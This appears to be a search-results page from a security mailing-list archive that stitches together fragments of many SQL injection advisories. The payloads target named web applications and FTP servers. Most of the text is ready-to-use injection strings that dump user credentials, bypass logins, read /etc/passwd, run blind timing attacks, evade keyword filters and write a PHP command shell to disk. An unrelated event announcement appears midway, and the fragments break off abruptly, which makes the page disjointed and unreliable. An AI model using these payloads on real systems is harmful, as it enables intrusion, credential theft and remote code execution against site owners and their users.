| New User, Welcome! Login |
Next Page >>
UNION
'forum' variable is taken from $_POST[] array and inserted in a sql query without
prior santization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
if ($user_id > 0) {
Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).
220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
5- [User] can see all the database information by a SQL injection.
5.1- Some exploits are:
~~~~~~~~~~~~~~~~5.1.1 Exploits~~~~~~~~~~~~~~~~~~~~~~~~
---See all users
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Name,FullName,Description,AdminLevel From Admin_List where 1=1 order by name
---AdminProp
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select propname,adminname,propvalue,propname From Adminprop where 1=1 order by name
---SQL SERVER
http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Databasename,Owner,Loginname,Servername From SQLServer where 1=1 order by name
---IISPasswords
A) Multiple Remote Command Execution
http://site/path/admin/uploadItem.php?image=.; ;
http://site/path/admin/removeItemResponse.php?ItemID=.; ping localhost ;
http://site/path/admin/removeCategoryResponse.php?CategoryID=-1' UNION SELECT '; ping localhost ;'%23
B) Multiple SQL Injection
http://site/path/description.php?II=-1' UNION SELECT 1,2,3,4,5,6,7%23&UID=VALID UID HERE
As you can see in the above code taken from /libs/link.php @ lines
200-209 the "id" variable is never sanitized before being used in a
query. The result is a highly exploitable SQL Injection vulnerability.
md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*
By sending a post request to vote.php with the above data an attacker
can successfully expose user credentials. Still, there are more SQL
Injection issues in Pligg, and next we will have a look at trackback.php
http://www.php.net/manual/en/features.http-auth.php
manual poc, visit http://host/path_to_geeklog/webservices/atom/index.php
then type:
username: ' AND 0 UNION SELECT 3,MD5('AAAA'),null,2 FROM gl_users LIMIT 1/*
password: AAAA
authentication mechanism is bypassed!
Note that it is passed base64_encode()'d !
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://site/path/index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
http://site/path/index.php?option=com_amblog&task=article&articleid=-1 UNION SELECT 1,CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 FROM jos_users
http://site/path/index.php?option=com_amblog&task=newform&catid=-1 UNION SELECT 1,CONCAT(username,0x3a,password) FROM jos_users
> Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
Could you please provide the version number which is affected by this?
Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I cannot
reproduce your report.
> USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>
> and a password of "1" (without quotes).
>
> which leads to a successful login. Different account logins can be made successful using the limit clase (e.g appending "LIMIT 5,1" will make you login with as the 5th account in the users table).
>
In this way attacker is able to ask boolean questions from database and retrieve
needed information bit by bit - example of classical blind sql injection.
If there is no active torrents in database, then induced sql errors method can be used.
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
"Subquery returns more than 1 row"
http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
of the database including user logins and password's of the WordPress
installation, allowing him to obtain access to the application and
gain administration privileges.
For the SQL Injection vulnerability, is possible to concatenate other
sql requests via "union select" sentence. The parameters "search_max"
and "forum" are affected by this flaw.
Snippet of vulnerable code:
In wpf.class file:
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1
1.2 SQL injections in repository
Attacker need to be authorized in system for success.
- [A] Multiple SQL Injection
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=1&forum_id=-1'
UNION ALL SELECT 1,2,CONCAT(nick, 0x3a, pwd),4,5,6,7,8 FROM
com_users%23
http://www.site.com/path/index.php?n=guest&c=0&m=forum&s=2&forum_id=0&topic_id=-1'
UNION ALL SELECT GROUP_CONCAT(CONCAT(nick, 0x3a, pwd)) FROM
com_users%23
Use Internet Explorer (IE) for best result.
Note: "'" used to bypass any SQL Injection denier.
3.1. SQL Injection in "/utils/getXsl.aspx" in "xslIdn" parameter.
-------------
http://[URL]/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
Open downloaded file by notepad.
-------------
3.2. SQL Injection in "/utils/getXml.aspx" in "part" parameter.
-------------
http://[URL]/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
POST /PSF/index.php?page=authentification HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: <SIZE>\r\n\r\n
username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29
%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=a
uthentification&button=Log+in\r\n\r\n
The SQL request will look's like this:
select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'
Example: (Will extract the database user)
1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"
2) Delay=5165.3031
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
A) Multiple SQL Injection
The following sample code don't need requirements.
http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
The following sample codes require that magic_quotes_gpc
is set to Off:
http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
For DBMS that support unbalanced C-Style comments, data can for example
be retrieved from the database as follows:
$ ./sql_inject.sh 73aaafec4a8db27af49c4c43bca4ac13 user@example.com \
"*/) UNION SELECT random(),'NULL',
('result::'||ItmFirstname||':'||ItmSurname) FROM ContactItem"
Joe:Plumber
John:Doe
Agent:Smith
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************
########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
###############################
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL
SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23
http://www.site.com/path/recipes.php?category=1&id=1 UNION SELECT
1,2,username,password,5,6 FROM fcms_users
A) Multiple SQL Injection
The solution adopted consists in transforming the query
string in uppercase and checking the existence of the
words UNION and SELECT. But using the C-like comments in
the query string, it is possible to bypass the filter.
Example:
SELECT becomes SE/**/LE/**/CT
UNION becomes UN/**/ION
[+] Code
- [A] Multiple Blind SQL Injection
http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '<?php
system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23
http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL
SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
http://www.site.com/path/config.inc
- [B] Authentication Bypass
Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password
- [C] Multiple SQL Injection
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
Mark Stanislav - mark.stanislav@gmail.com
I. DESCRIPTION
---------------------------------------
A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur.
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
index.php?option=com_artforms&task=ferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23
index.php?option=com_artforms&task=vferforms&id=1 UNION SELECT 1,2,3,4,5,6%23
index.php?option=com_artforms&task=tferforms&viewform=1 UNION SELECT 1,2,3,4,5,6%23
B) Directory Traversal
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
582| {
583| $this->fatal_error( "..." );
584| return false;
585| }
586|
587| if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )
588| {
589| $this->fatal_error( "..." );
590| return false;
591| }
592| else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )
Greetings,
The Spanish Ministry for Science and Innovation presents in Madrid
from 14th – 18th April, and during the Spanish Presidency of the
European Union, Campus Party Europe
(http://www.campus-party.eu/home-en.html) : a special edition of what
is considered the biggest event for technology, creativity and digital
culture online in the world.
For four days, 800 young people from each of the 27 member states of
Poc/Exploit:
~~~~~~~~~~
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11--
http://www.target.com/index.php?module=pnEncyclopedia&func=display_term&id=9999 union select 1,2,3,4,5,6,concat(pn_uname,0x3a,pn_pass),8,9,10,11 from nuke_users limit 1,1--
Dork:
~~~~~
$hash="";
#QUERY RISULTANTE
#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1/*
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
Next Page>>
|
|
|
